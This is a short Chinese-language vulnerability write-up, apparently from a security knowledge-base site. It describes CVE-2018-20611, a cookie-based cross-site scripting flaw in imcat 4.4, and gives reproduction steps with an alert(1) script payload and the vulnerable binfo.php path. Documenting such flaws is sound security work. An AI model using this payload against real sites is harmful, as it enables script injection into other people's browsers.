menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right _(CVE-2018-20611)Imcat 4.4 xss chevron_right _(CVE-2018-20611)Imcat 4.4 xss .md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    _(CVE-2018-20611)Imcat 4.4 xss .md
    741 B / 2021-07-15 19:53:58
        (CVE-2018-20611)Imcat 4.4 xss
    ===============================
    
    一、漏洞简介
    ------------
    
    imcat是一套基于PHP的开源建站系统。 imcat
    4.4版本存在跨站脚本漏洞。远程攻击者可通过向root/tools/adbug/binfo.php?cookie
    URI发送特制的cookie利用该漏洞注入任意的Web脚本或HTML。
    
    二、漏洞影响
    ------------
    
    imcat 4.4
    
    三、复现过程
    ------------
    
    将cookie的值修改成
    
        "><script>alert(1)</script>
    
    ![](./resource/(CVE-2018-20611)Imcat4.4xss/media/rId24.png)
    
    然后访问
    
        http://www.0-sec.org/root/tools/adbug/binfo.php?cookie`
    
    ![](./resource/(CVE-2018-20611)Imcat4.4xss/media/rId25.png)
    
    参考链接
    --------
    
    > <https://github.com/AvaterXXX/CVEs/blob/master/imcat.md>
    
    
    links
    file_download